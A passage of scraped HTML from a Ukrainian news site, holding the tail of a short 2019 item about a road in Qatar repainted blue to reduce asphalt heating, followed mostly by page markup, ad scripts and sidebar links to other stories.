target="_blank" href="https://enovosty.com/news_economy/full/2507-okonchanie-gazovogo-kontrakta-s-rf-naftogaz-obratil-vzor-v-storonu-katara" >Окончание газового контракта с РФ: "Нафтогаз" обратил взор в сторону Катара</a></p><p>На протяжении ближайших 18 месяцев специалисты будут наблюдать за дорогой и делать регулярные температурные замеры. Если все пойдет хорошо, то подобные синие дороги появятся по всему Катару.</p><div class="tptn_counter" style="color:white;" id="tptn_counter_4769418"><script type="text/javascript" src="https://enovosty.com/wp-content/plugins/top-10/top-10-counter.js.php?top_ten_id=4769418&amp;_wpnonce=3439cdb019"></script></div><div class="swp-content-locator"></div><br /><span itemprop="publisher" itemscope itemtype="https://schema.org/Organization"><div itemprop="logo" itemscope itemtype="https://schema.org/ImageObject"><img itemprop="url image" style="display:none;" src="https://enovosty.com/wp-content/themes/eizvestia/img/srclogo.png"/> <meta itemprop="width" content="280"> <meta itemprop="height" content="55"></div><meta itemprop="name" content="Экономические новости" /><meta itemprop="telephone" content="+380958836229"><meta itemprop="address" content="Киев"></span><span itemprop="author" itemscope itemtype="https://schema.org/Person"><meta itemprop="name" content="Катерина Лукьянчук" /></span><meta itemprop="datePublished" content="2019-08-18T14:21:16+03:00"/><meta itemprop="dateModified" content="2019-08-18T14:21:16+03:00"/><meta itemprop="genre" content="Новости технологий"/><meta itemprop="description" content="В столице Катара одну из автодорог перекрасили в синий цвет. Дорожники пошли на такой шаг для того, чтобы уменьшить температуру нагрева асфальта."/><div itemprop="image" itemscope itemtype="https://schema.org/ImageObject" rel="nofollow"><span itemprop="url" itemprop="image" content="https://enovosty.com/wp-content/uploads/2019/08/630_360_1566113819-897-460x263.jpg"><span itemprop="image" content="https://enovosty.com/wp-content/uploads/2019/08/630_360_1566113819-897-460x263.jpg"><meta itemprop="width" content="460"><meta itemprop="height" content="263"> </span></span></div></article></div> <div class="postFooter" style="padding:0;"><span id="authorName" style="margin-right: 25px;float: left;"><span id="label">Автор: Катерина Лукьянчук</span></span><div id="posttags" style="max-width: 360px;float: left;margin:10px 0 10px 7px; clear: both;">ТЕГИ: <a href="https://enovosty.com/tag/asfalt" rel="tag">асфальт</a>, <a href="https://enovosty.com/tag/katar" rel="tag">Катар</a></div><div style="font: 11px/16px Arial,Verdana,sans-serif;float: right;">Посещений: 1665</div><div class="voteBox" > </div><br /><p style="color:#a3a3a3;font-size:12px;clear:both;">Если Вы заметили орфографическую ошибку, выделите её мышью и нажмите Ctrl+Enter</p><div class="border">&nbsp;</div><table class="social"><tr><td><div class="swp_social_panel swp_horizontal_panel swp_flat_fresh swp_default_full_color swp_individual_full_color swp_other_full_color scale-100 scale-" data-min-width="1100" data-float-color="#ffffff" data-float="none" data-float-mobile="none" data-transition="slide" ><div class="nc_tweetContainer swp_share_button swp_facebook" data-network="facebook"><a class="nc_tweet swp_share_link" rel="nofollow noreferrer noopener" target="_blank" href="https://www.facebook.com/share.php?u=https%3A%2F%2Fenovosty.com%2Fnews_technology%2Ffull%2F1808-v-katare-asfalt-perekrashivayut-v-sinij-cvet" data-link="https://www.facebook.com/share.php?u=https%3A%2F%2Fenovosty.com%2Fnews_technology%2Ffull%2F1808-v-katare-asfalt-perekrashivayut-v-sinij-cvet"><span class="iconFiller"><span class="spaceManWilly"><i class="sw swp_facebook_icon"></i><span class="swp_share">Поделиться</span></span></span><span class="swp_count">8</span></a></div><div class="nc_tweetContainer swp_share_button swp_twitter" data-network="twitter"><a class="nc_tweet swp_share_link" rel="nofollow noreferrer noopener" target="_blank" href="https://twitter.com/intent/tweet?text=%D0%92+%D0%9A%D0%B0%D1%82%D0%B0%D1%80%D0%B5+%D0%B0%D1%81%D1%84%D0%B0%D0%BB%D1%8C%D1%82+%D0%BF%D0%B5%D1%80%D0%B5%D0%BA%D1%80%D0%B0%D1%88%D0%B8%D0%B2%D0%B0%D1%8E%D1%82+%D0%B2+%D1%81%D0%B8%D0%BD%D0%B8%D0%B9+%D1%86%D0%B2%D0%B5%D1%82&url=https%3A%2F%2Fenovosty.com%2Fnews_technology%2Ffull%2F1808-v-katare-asfalt-perekrashivayut-v-sinij-cvet&via=enovosty" data-link="https://twitter.com/intent/tweet?text=%D0%92+%D0%9A%D0%B0%D1%82%D0%B0%D1%80%D0%B5+%D0%B0%D1%81%D1%84%D0%B0%D0%BB%D1%8C%D1%82+%D0%BF%D0%B5%D1%80%D0%B5%D0%BA%D1%80%D0%B0%D1%88%D0%B8%D0%B2%D0%B0%D1%8E%D1%82+%D0%B2+%D1%81%D0%B8%D0%BD%D0%B8%D0%B9+%D1%86%D0%B2%D0%B5%D1%82&url=https%3A%2F%2Fenovosty.com%2Fnews_technology%2Ffull%2F1808-v-katare-asfalt-perekrashivayut-v-sinij-cvet&via=enovosty"><span class="swp_count swp_hide"><span class="iconFiller"><span class="spaceManWilly"><i class="sw swp_twitter_icon"></i><span class="swp_share">Tвитнуть</span></span></span></span></a></div><div class="nc_tweetContainer swp_share_button swp_linkedin" data-network="linkedin"><a class="nc_tweet swp_share_link" rel="nofollow noreferrer noopener" target="_blank" href="https://www.linkedin.com/cws/share?url=https%3A%2F%2Fenovosty.com%2Fnews_technology%2Ffull%2F1808-v-katare-asfalt-perekrashivayut-v-sinij-cvet" data-link="https://www.linkedin.com/cws/share?url=https%3A%2F%2Fenovosty.com%2Fnews_technology%2Ffull%2F1808-v-katare-asfalt-perekrashivayut-v-sinij-cvet"><span class="swp_count swp_hide"><span class="iconFiller"><span class="spaceManWilly"><i class="sw swp_linkedin_icon"></i><span class="swp_share">Поделиться</span></span></span></span></a></div></div></td></tr></table><div class="printmail" style="float: right; width: 54px; margin-top: 8px;"> <a href="https://enovosty.com/print?printajax=4769418" style="padding-right:3px;"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/print.png" width="18" height="18" alt="Печать" title="Печать"></a> <a href="#" id="mailto"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/mailto.png" width="26" height="18" alt="Отправить на почту" title="Отправить на почту"></a><div class="mailwin" style="display:none;"><span class="link-close" title="Закрыть"><span class="close">Закрыть</span></span><input type="text" onclick="if (this.value == 'Введите e-mail') this.value = ''" onblur="if (this.value == '') this.value = 'Введите e-mail'" name="mail" value="Введите e-mail" /><button>Отправить</button></div><p class="al_loadingImage" style="top:4%;">&nbsp;</p></div><div class="border">&nbsp;</div><link rel="stylesheet" type="text/css" media="screen" href="https://enovosty.com/wp-content/plugins/ajax-login/login.css?v=2" /><div id="popup-login"><div class="login"><div class="caption"><span class="title">Вход на сайт</span><a class="link-close" href="#"><span class="close">Закрыть</span></a></div><form name="loginform" id="loginform" action="#" method="post"><p class="error"></p><p class="message"></p><img id="al_loadingImage" alt="Загрузка..." src="https://enovosty.com/wp-content/plugins/ajax-login/al_loading.gif"/><p><label for="user_login">Логин (email):</label><input type="text" name="user_login" id="user_login" class="input" value="" size="20" /></p><p><label for="user_pass">Пароль:</label><input type="password" name="pwd" id="user_pass" class="input" value="" size="20" /></p><div class="login-footer"><p class="forgetmenot"><input name="rememberme" type="checkbox" id="rememberme" value="forever" /><label for="rememberme">Запомнить меня</label></p><p class="submit"><input type="button" onClick="sendLogin('https://enovosty.com/wp-content/plugins/ajax-login/login.php', jQuery('#loginform').serialize());return false;" name="wp-submit" id="wp-submit" value="Войти" />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<a target="_blank" href="/register" id="wp-register">Зарегистрироваться</a></p></div><fieldset><legend>или</legend><div class="soclogin"><style type="text/css">#wp-social-login-connect-with{clear:both;display:block;font-size:13px;font-weight:normal;padding-top:6px}#wp-social-login-connect-options{padding:4px 0}#wp-social-login-connect-options a{text-decoration:none;margin-right:5px}#wp-social-login-connect-options img{border:0 none;width:22px}.wsl_connect_with_provider{}</style><div class="wp-social-login-widget"><div class="wp-social-login-connect-with">Войти с помощью:</div><div class="wp-social-login-provider-list"><a rel="nofollow" href="https://enovosty.com/authtonews.php?action=wordpress_social_authenticate&#038;mode=login&#038;provider=Facebook&#038;redirect_to=http%3A%2F%2Fenovosty.com%2Fnews_technology%2Ffull%2F1808-v-katare-asfalt-perekrashivayut-v-sinij-cvet" title="Connect with Facebook" class="wp-social-login-provider wp-social-login-provider-facebook" data-provider="Facebook"><img alt="Facebook" title="Connect with Facebook" src="https://enovosty.com/wp-content/plugins/wordpress-social-login/assets/img/32x32/wpzoom/facebook.png" /></a><a rel="nofollow" href="https://enovosty.com/authtonews.php?action=wordpress_social_authenticate&#038;mode=login&#038;provider=Google&#038;redirect_to=http%3A%2F%2Fenovosty.com%2Fnews_technology%2Ffull%2F1808-v-katare-asfalt-perekrashivayut-v-sinij-cvet" title="Connect with Google" class="wp-social-login-provider wp-social-login-provider-google" data-provider="Google"><img alt="Google" title="Connect with Google" src="https://enovosty.com/wp-content/plugins/wordpress-social-login/assets/img/32x32/wpzoom/google.png" /></a><a rel="nofollow" href="https://enovosty.com/authtonews.php?action=wordpress_social_authenticate&#038;mode=login&#038;provider=Twitter&#038;redirect_to=http%3A%2F%2Fenovosty.com%2Fnews_technology%2Ffull%2F1808-v-katare-asfalt-perekrashivayut-v-sinij-cvet" title="Connect with Twitter" class="wp-social-login-provider wp-social-login-provider-twitter" data-provider="Twitter"><img alt="Twitter" title="Connect with Twitter" src="https://enovosty.com/wp-content/plugins/wordpress-social-login/assets/img/32x32/wpzoom/twitter.png" /></a></div><div class="wp-social-login-widget-clearing"></div></div> </div></fieldset></form></div></div><script type="text/javascript" src="https://enovosty.com/wp-content/plugins/ajax-login/ajaxlogin.js"></script><input style="width: auto;float: none;background: #2196F3;margin: 5px 0;padding: 0 10px;font-size: 12px;" type="button" value="Вход/Регистрация" id="addanons" name="wp-submit" onclick="get_auth()" ><style type="text/css" media="screen">@import url(/wp-content/plugins/ajax-comment-loading/css/style.css?v=8);</style><noscript>Для загрузки комментариев нужен JavaScript.</noscript><div id="comments-loading" style="display:none">Комментарии...</div><div id="comments-loaded"></div><input type="hidden" name="comments_nonce" value="fea0cfd16c" id="comments_nonce" /><script type="text/javascript">document.getElementById('comments-loading').style.display = 'block';</script></div>  </div><br /><div id='div-gpt-ad-1531223757969-0' style='height:600px; width:300px;'><script>googletag.cmd.push(function() { googletag.display('div-gpt-ad-1531223757969-0'); });</script></div><div style="height: 10px; background-color: #fff;"></div><div class="mainPageWiget blogmain" style="border: 1px solid #dee7ee; padding: 0; margin: 0;"><div><a href="/vybory-2019"><img src="/wp-content/themes/eizvestia/img/vibory_2019.png" alt="Выборы 2019" /></a></div><table style="width:100%; margin-top: 5px;"><tr><td style="width:32.2999999999999971578290569595992565155029296875%;text-align: center;vertical-align: bottom; padding: 5px 2px;"><div class="img"><a href="https://enovosty.com/news_politics/full/408-cena-golosa-za-partiyu-sluga-naroda-19-griven-kiu" title="Цена голоса за партию Слуга народа 19 гривен - КИУ"><img style="width: 145px; height:94px" alt="Цена голоса за партию Слуга народа 19 гривен - КИУ" src="/wp-content/themes/eizvestia/img/vybory_4.jpg"></a></div></td><td style="width:32.2999999999999971578290569595992565155029296875%;text-align: center;vertical-align: bottom; padding: 5px 2px;"><div class="img"><a href="https://enovosty.com/news_politics/full/2507-rada-intrig-i-syurprizov-kak-vyglyadit-portret-vru-ix-sozyva" title="Рада интриг и сюрпризов: Как выглядит портрет ВРУ IX созыва"><img style="width: 145px; height:94px" alt="Рада интриг и сюрпризов: Как выглядит портрет ВРУ IX созыва" src="/wp-content/uploads/2019/07/24412625-300x201.jpg"></a></div></td><td style="width:32.2999999999999971578290569595992565155029296875%;text-align: center;vertical-align: bottom; padding: 5px 2px;"><div class="img"><a href="https://enovosty.com/news_politics/full/2407-medvedchuk-v-novoj-rade-budet-v-oppozicionnom-getto-politolog" title="Медведчук в новой Раде будет в «оппозиционном гетто» - политолог"><img style="width: 145px; height:94px" alt="Медведчук в новой Раде будет в «оппозиционном гетто» - политолог" src="/wp-content/uploads/2019/07/fesenko-300x185.jpg"></a></div></td></tr><tr><td style="width:32.2999999999999971578290569595992565155029296875%;"><a class="postTitle" href="https://enovosty.com/news_politics/full/408-cena-golosa-za-partiyu-sluga-naroda-19-griven-kiu" style="color: #000000; font-size: 12px; line-height: 13px;">Цена голоса за партию "Слуга народа" 19 гривен - КИУ</a></td><td style="width:32.2999999999999971578290569595992565155029296875%;"><a class="postTitle" href="https://enovosty.com/news_politics/full/2507-rada-intrig-i-syurprizov-kak-vyglyadit-portret-vru-ix-sozyva" style="color: #000000; font-size: 12px; line-height: 13px;">Рада интриг и сюрпризов: Как выглядит портрет ВРУ IX созыва</a></td><td style="width:32.2999999999999971578290569595992565155029296875%;"><a class="postTitle" href="https://enovosty.com/news_politics/full/2407-medvedchuk-v-novoj-rade-budet-v-oppozicionnom-getto-politolog" style="color: #000000; font-size: 12px; line-height: 13px;">Медведчук в новой Раде будет в «оппозиционном гетто» - политолог</a></td></tr></table><div class="more"><a href="/vybory-2019">Все Выборы</a></div></div><div style="height: 10px; background-color: #fff;"></div> <div class="mainPageWiget articles" style="overflow:visible;"><p style="height: auto;overflow: visible; font-weight: 700;font-family: arial,verdana,tahoma;margin: 0;"><a style="color:#000;font-size: 16px;" href="https://enovosty.com/articles">Аналитика</a></p><hr style="border: 1px solid #000000;"><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4769236"><div class="blockTitle"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/ei_size.gif" /><a class="postTitle" href="https://enovosty.com/politika/full/1708-itogi-nedeli-predchuvstvie-reform-rozhdenie-komitetov-i-zaderzhanie-grimchaka">Итоги недели: Предчувствие реформ, рождение комитетов и задержание Гримчака</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4769097"><div class="blockTitle"><a class="postTitle" href="https://enovosty.com/markets/full/1508-rynok-chastnyx-klinik-perezagruzka">Рынок частных клиник: перезагрузка</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4768996"><div class="blockTitle"><a class="postTitle" href="https://enovosty.com/ekonomika/full/1408-tumannye-perspektivy-ekonomicheskogo-sotrudnichestva-po-motivam-vizita-zelenskogo-v-turciyu">Туманные перспективы экономического сотрудничества. По мотивам визита Зеленского в Турцию</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4768408"><div class="blockTitle"><a class="postTitle" href="https://enovosty.com/markets/full/908-kak-na-morskom-poberezhe-rynok-arendy-elitnyx-kottedzhej-pod-kievom">Как на морском побережье: Рынок аренды элитных коттеджей под Киевом</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4768221"><div class="blockTitle"><a class="postTitle" href="https://enovosty.com/politika/full/708-polnyj-rsmd-ec-nastal-chto-budet-posle-vyxoda-rossii-i-ssha-iz-dogovora-o-zaprete-raket-srednej-i-menshej-dalnosti">Полный РСМД-ец настал! Что будет после выхода России и США из договора о запрете ракет средней и меньшей дальности</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4767524"><div class="blockTitle"><a class="postTitle" href="https://enovosty.com/politika/full/208-itogi-nedeli-shag-do-yadernoj-vojny-priklyuchenie-slug-naroda-v-truskavce-i-goryachij-sankcionnyj-avgust">Итоги недели: Шаг до ядерной войны, приключение слуг народа в Трускавце и горячий санкционный август</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4767539"><div class="blockTitle"><a class="postTitle" href="https://enovosty.com/politika/full/208-korrupcionno-nevezhestvennyj-naezd-na-nenastoyashhego-stolichnogo-mera">Незаконный наезд на "ненастоящего" столичного мэра</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4767229"><div class="blockTitle"><a class="postTitle" href="https://enovosty.com/politika/full/3107-itogi-dnya-boj-byurokraticheskomu-adu-fruktovyj-rekordsmen-i-opasnaya-supersila-grivny">Итоги дня: Бой бюрократическому аду, фруктовый рекордсмен и опасная суперсила гривны</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4766940"><div class="blockTitle"><a class="postTitle" href="https://enovosty.com/politika/full/3007-itogi-dnya-i-rost-zarplat">Итоги дня: Арест российского танкера, "золотой" хлеб и рост зарплат</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4767122"><div class="blockTitle"><a class="postTitle" href="https://enovosty.com/politika/full/3007-arest-rossijskogo-sudna-v-izmaile-i-ego-somnitelnye-posledstviya">Арест российского судна в Измаиле и его сомнительные последствия</a></div><div class="more"><a href="https://enovosty.com/articles">Все статьи</a></div></div></div><br /><div
id='admixer_3b1188cc66144215a9bc9ecb1d9b44e9_zone_7939_sect_1082_site_1069'></div><script type='text/javascript'>admixerML.fn.push(function() {admixerML.display('admixer_3b1188cc66144215a9bc9ecb1d9b44e9_zone_7939_sect_1082_site_1069');});</script><div id="pop_video" class="six"><p class="head"><span>популярные видео</span></p><div class="caption" data-limit="6"> <div class="caption_link"><a href="javascript:void(0)" class="active" onclick="getbVideo(0)">читаемые</a>&nbsp;&nbsp;<a href="javascript:void(0)" data-rb="1" onclick="getbVideo(1)">комментируемые</a></div><div class="popular-sort"><div class="sort"><a onclick="getPopVideo(31)">месяц</a></div><div class="sort"><a class="active" onclick="getPopVideo(7)">неделю</a>&nbsp;&nbsp;|</div><div class="sort">за&#160;&#160;<a onclick="getPopVideo(1)">сутки</a>&nbsp;&nbsp;|</div></div></div> <table style="width:100%;" class="newsbody"><tr><td class="photo "><div class="aimg"><a href="https://enovosty.com/politika-video/full/1208-aparshin-zayavil-o-podgotovke-rf-k-polnomasshtabnomu-vtorzheniyu-video"><img width="142" height="88" alt="Апаршин заявил о подготовке РФ к полномасштабному вторжению" src="https://enovosty.com/wp-content/uploads/2019/08/59_tn.jpg" /><span class="stopbg"></span></a><a class="title" href="https://enovosty.com/politika-video/full/1208-aparshin-zayavil-o-podgotovke-rf-k-polnomasshtabnomu-vtorzheniyu-video">Апаршин заявил о подготовке РФ к полномасштабному вторжению</a></div></td><td class="photo "><div class="aimg"><a href="https://enovosty.com/news_abroad/full/1308-v-rossii-novoe-chp-gorit-poligon-ximicheskix-otxodov-video"><img width="142" height="88" alt="В России новое ЧП: горит полигон химических отходов" src="https://enovosty.com/wp-content/uploads/2019/08/fa5beef19756eab97702c298dd60a6c5.jpg" /><span class="stopbg"></span></a><a class="title" href="https://enovosty.com/news_abroad/full/1308-v-rossii-novoe-chp-gorit-poligon-ximicheskix-otxodov-video">В России новое ЧП: горит полигон химических отходов</a></div></td><td class="photo last"><div class="aimg"><a href="https://enovosty.com/news_abroad/full/1208-v-rossii-priznali-fakt-vzryva-malogabaritnogo-yadernogo-reaktora-video"><img width="142" height="88" alt="В России признали факт взрыва малогабаритного ядерного реактора" src="https://enovosty.com/wp-content/uploads/2019/08/file37839189_4a8be89e-e1565605140329.jpg" /><span class="stopbg"></span></a><a class="title" href="https://enovosty.com/news_abroad/full/1208-v-rossii-priznali-fakt-vzryva-malogabaritnogo-yadernogo-reaktora-video">В России признали факт взрыва малогабаритного ядерного реактора</a></div></td></tr><tr><td class="view"><span><i></i>4242</span></td><td class="view"><span><i></i>3428</span></td><td class="view last"><span><i></i>2866</span></td></tr><tr><td class="photo "><div class="aimg"><a href="https://enovosty.com/news_technology/full/1608-v-antarktide-nashli-piramidu-podo-ldom-video"><img width="142" height="88" alt="В Антарктиде нашли пирамиду подо льдом" src="https://enovosty.com/wp-content/uploads/2019/08/antarktida-4-e1565946368753.jpg" /><span class="stopbg"></span></a><a class="title" href="https://enovosty.com/news_technology/full/1608-v-antarktide-nashli-piramidu-podo-ldom-video">В Антарктиде нашли пирамиду подо льдом</a></div></td><td class="photo "><div class="aimg"><a href="https://enovosty.com/news_abroad/full/1308-v-rossii-snova-proizoshel-vzryv-na-voennom-sklade-video"><img width="142" height="88" alt="В России снова произошел взрыв на военном складе" src="https://enovosty.com/wp-content/uploads/2019/08/a299af6c56d805480f4d08bfbd9df2a9-e1565687309158.png" /><span class="stopbg"></span></a><a class="title" href="https://enovosty.com/news_abroad/full/1308-v-rossii-snova-proizoshel-vzryv-na-voennom-sklade-video">В России снова произошел взрыв на военном складе</a></div></td><td class="photo last"><div class="aimg"><a href="https://enovosty.com/topvideo1/full/1108-ukrainskie-morpexi-prinyali-uchastie-v-ucheniyax-nato-video"><img width="142" height="88" alt="Украинские морпехи приняли участие в учениях НАТО" src="https://enovosty.com/wp-content/uploads/2019/08/thumbnail-tw-20180523160400-2096-e1565533710489.jpg" /><span class="stopbg"></span></a><a class="title" href="https://enovosty.com/topvideo1/full/1108-ukrainskie-morpexi-prinyali-uchastie-v-ucheniyax-nato-video">Украинские морпехи приняли участие в учениях НАТО</a></div></td></tr><tr><td class="view"><span><i></i>1880</span></td><td class="view"><span><i></i>1808</span></td><td class="view last"><span><i></i>1671</span></td></tr></table><div class="more"><a href="https://enovosty.com/video">Все Видео</a></div></div> <div id='div-gpt-ad-1516280158772-0' style='height:60px; width:468px;'></div><script type='text/javascript'>googletag.cmd.push(function() { googletag.display('div-gpt-ad-1516280158772-0'); });</script></br><div class="wiget text_chit"><p style="margin:0; padding-left:10px; font-size: 12px;">Читайте также</p><table cellpadding="0" cellspacing="0" border="0" class="table_chit"><tr><td> <a class="postTitle" href="https://enovosty.com/news_economy/full/2507-okonchanie-gazovogo-kontrakta-s-rf-naftogaz-obratil-vzor-v-storonu-katara" rel="bookmark">Окончание газового контракта с РФ: "Нафтогаз" обратил взор в сторону Катара</a><br /></td> <td> <a class="postTitle" href="https://enovosty.com/news_abroad/full/2406-katar-i-ssha-mogut-potesnit-rf-na-gazovom-rynke-evropy" rel="bookmark">Катар и США могут потеснить РФ на газовом рынке Европы</a><br /></td> </tr><tr><td> <a class="postTitle" href="https://enovosty.com/news-markets/full/1105-minregion-izmenil-normy-kachestva-asfalta-dlya-ukrainskix-trass" rel="bookmark">Минрегион изменил нормы качества асфальта для украинских трасс</a><br /></td> <td> <a class="postTitle" href="https://enovosty.com/news_abroad/full/1005-v-katar-pribyla-gruppa-amerikanskix-bombardirovshhikov-b-52" rel="bookmark">В Катар прибыла группа американских бомбардировщиков B-52</a><br /></td> </tr><tr><td> <a class="postTitle" href="https://enovosty.com/news_politics/full/1803-rossiya-v-krymu-sdulas-ne-naduvshis-krymskij-banderovec" rel="bookmark">Россия в Крыму сдулась, не надувшись, - КРЫМский бандеровец</a><br /></td> <td> <a class="postTitle" href="https://enovosty.com/news_economy/full/312-ponomar-rasskazal-chto-budet-s-neftyu-posle-vyxoda-katara-iz-opek" rel="bookmark">Пономарь рассказал, что будет с нефтью после выхода Катара из ОПЕК</a><br /></td> </tr><tr><td> <a class="postTitle" href="https://enovosty.com/news_politics/full/211-u-ukrainy-poyavilsya-eshhe-odin-bezviz" rel="bookmark">У Украины появился еще один "безвиз"</a><br /></td> <td> <a class="postTitle" href="https://enovosty.com/news_kiev/full/1908-v-centre-kieva-provalilsya-asfalt-izmeneny-marshruty-obshhestvennogo-transporta" rel="bookmark">В центре Киева провалился асфальт: изменены маршруты общественного транспорта</a><br /></td> </tr><tr></tr></table></div> <div id="M417238ScriptRootC689974" onclick="trackOutboundLink(this, 'IdealMedia', 'idealmedia.io');"><div id="M417238PreloadC689974"> Загрузка... </div></div><script> (function () { var script = document.createElement('script');script.src = "//jsc.idealmedia.io/e/n/enovosty.com.689974.js?t=" + ((d = new Date()) ? '' + d.getYear() + d.getMonth() + d.getUTCDate() + d.getUTCHours() : '');
script.async = true; document.body.appendChild(script); })();</script> <script>jQuery(document).ready(function($){function region(){html = $('#lastafishasingle .anythingWindow .activePage .region').html();$('#lastafishasingle .head span').html(html);}$('#sliderafishasingle').anythingSlider({ theme : 'minimalist-round', buildStartStop  : false,buildNavigation : false,enableNavigation : false,hashTags : false,autoPlay :false,delay : 4000,resizeContents:false,onInitialized:function(slider){region();}, onSlideComplete:function(slider){region();},});});</script><style>#sliderafishasingle .tact li{float:left;width:220px;line-height:8px}#lastafishasingle div.anythingSlider-minimalist-round{margin:auto}#lastafishasingle .postafisha{width:224px}#lastafishasingle h2{text-align:left;padding:10px 32px 10px 35px}#lastafishasingle .title a{display:block;font-size:13px;font-weight:700;text-align:left}#lastafishasingle{margin-bottom:10px;padding:0}#lastafishasingle .title{padding:5px 35px 5px 25px}#lastafishasingle.slide div.anythingSlider-minimalist-round .back,#lastafishasingle.slide div.anythingSlider-minimalist-round .forward{width:40px;height:132px;opacity:1;background-color:transparent}#lastafishasingle.slide div.anythingSlider-minimalist-round .arrow a{background:url("img/slider-arrows1.png") no-repeat;width:20px;height:45px;margin-top:54px;margin-left:10px}#lastafishasingle{background:url("https://enovosty.com/wp-content/themes/eizvestia/img/afisha5.png") repeat;border:1px solid #daa36b;-moz-background-size:100%; -webkit-background-size:100%; -o-background-size:100%; background-size:100%}#lastafishasingle .anythingSlider{border-bottom:1px solid #a99168}#lastafishasingle.slide div.anythingSlider-minimalist-round .arrow a{background:url("https://enovosty.com/wp-content/themes/eizvestia/img/afisha_arrows3.png") no-repeat}#lastafishasingle.slide div.anythingSlider-minimalist-round .forward a{background-position:right 0;margin-left:18px}#lastafishasingle .allafisha{display:block;text-align:right;font-size:14px;font-weight:bold;margin:0;padding:6px 10px 6px}#lastafishasingle .postafisha{position:relative}#lastafishasingle h2 span{float:right;font-size:11px;line-height:18px}#lastafishasingle .region{font-size:13px;text-align:left;padding:0 25px 5px}#lastafishasingle.slide.ssingle h2{padding:10px 17px 3px 40px;font-size:17px}#lastafishasingle.slide.ssingle div.anythingSlider-minimalist-round .back,#lastafishasingle.slide.ssingle div.anythingSlider-minimalist-round .forward{width:27px;right:-5px}#lastafishasingle.slide.ssingle div.anythingSlider-minimalist-round .arrow a{margin-left:0px}#lastafishasingle.slide.ssingle div.anythingSlider-minimalist-round .forward a{margin-left:7px}#lastafishasingle.slide.ssingle .postafisha{width:220px;text-align:right}#lastafishasingle.slide.ssingle .postafisha .aimg{text-align:center;overflow:visible}#lastafishasingle.slide.ssingle .postafisha .aimg img{overflow:visible;box-shadow:0.4em 0.4em 2px rgba(122,122,122,0.5);-moz-box-shadow:0.4em 0.4em 2px rgba(122,122,122,0.5);-webkit-box-shadow:0.4em 0.4em 2px rgba(122,122,122,0.5);-ms-box-shadow:0.4em 0.4em 2px rgba(122,122,122,0.5);-o-box-shadow:0.4em 0.4em 2px rgba(122,122,122,0.5);-khtml-box-shadow:0.4em 0.4em 2px rgba(122,122,122,0.5)}</style><div id="lastafishasingle" class="slide ssingle"><p class="head">Афиша</p><ul id="sliderafishasingle"><li><ul class="tact"><li><ul class="tact"><li ><div id="post-4768603" class="postafisha"><span class="region">Киев 22&#160;серпня</span><div class="aimg"><a href="https://enovosty.com/kino/full/1208-kinopremera-film-malenkoe-krasnoe-plate"><img width="170" height="132" alt="Кинопремьера: фильм «Маленькое красное ..." src="/wp-content/uploads/2019/08/suknya.jpg"><span class="stopbg"></span></a></div><div class="title"><a href="https://enovosty.com/kino/full/1208-kinopremera-film-malenkoe-krasnoe-plate">Кинопремьера: фильм «Маленькое красное ...</a></div></div></li></ul></li><li><ul class="tact"><li ><div id="post-4768618" class="postafisha"><span class="region">Киев 22&#160;серпня</span><div class="aimg"><a href="https://enovosty.com/kino/full/1208-kinopremera-film-polina-i-tajna-kinostudii"><img width="170" height="132" alt="Кинопремьера: фильм «Полина и тайна киностудии» ..." src="/wp-content/uploads/2019/08/polina2.jpg"><span class="stopbg"></span></a></div><div class="title"><a href="https://enovosty.com/kino/full/1208-kinopremera-film-polina-i-tajna-kinostudii">Кинопремьера: фильм «Полина и тайна киностудии» ...</a></div></div></li></ul></li></ul></li> </ul><a href="https://enovosty.com/afisha" class="allafisha">Вся Афиша&nbsp;&nbsp;&nbsp;&nbsp;>></a></div><div class="mainarmiya"><p><a style="font-size: 17px;" href="https://enovosty.com/armiya">Армия</a></p><table style="width:100%;"><tr><td style="width:24%;"><div style="border:none; padding-top:3px;" id="post-4346141"><a href="https://enovosty.com/armiya/full/234-zenitno-raketnyj-kompleks-buk-m1" ><img width="101" height="80" src="https://enovosty.com/wp-content/uploads/2014/03/buk_m1-101x80.jpg" class="attachment-101x80 size-101x80 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2014/03/buk_m1-101x80.jpg 101w, https://enovosty.com/wp-content/uploads/2014/03/buk_m1-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2014/03/buk_m1.jpg 280w" sizes="(max-width: 101px) 100vw, 101px" /></a><a class="postTitle" href="https://enovosty.com/armiya/full/234-zenitno-raketnyj-kompleks-buk-m1" >Зенитно-ракетный комплекс «Бук-М1»</a></div></td> <td style="width:24%;"><div style="border:none; padding-top:3px;" id="post-4362143"><a href="https://enovosty.com/armiya/full/584-snajperskaya-vintovka-tasko-7et3" ><img width="101" height="80" src="https://enovosty.com/wp-content/uploads/2014/06/tasko-101x80.jpg" class="attachment-101x80 size-101x80 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2014/06/tasko-101x80.jpg 101w, https://enovosty.com/wp-content/uploads/2014/06/tasko-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2014/06/tasko.jpg 280w" sizes="(max-width: 101px) 100vw, 101px" /></a><a class="postTitle" href="https://enovosty.com/armiya/full/584-snajperskaya-vintovka-tasko-7et3" >Снайперская винтовка ТАСКО 7ЕТ3</a></div></td> <td style="width:24%;"><div style="border:none; padding-top:3px;" id="post-4385524"><a href="https://enovosty.com/armiya/full/135-granatomet-at4-ssha-shveciya" ><img width="101" height="80" src="https://enovosty.com/wp-content/uploads/2014/09/at4-101x80.jpg" class="attachment-101x80 size-101x80 wp-post-image" alt="" 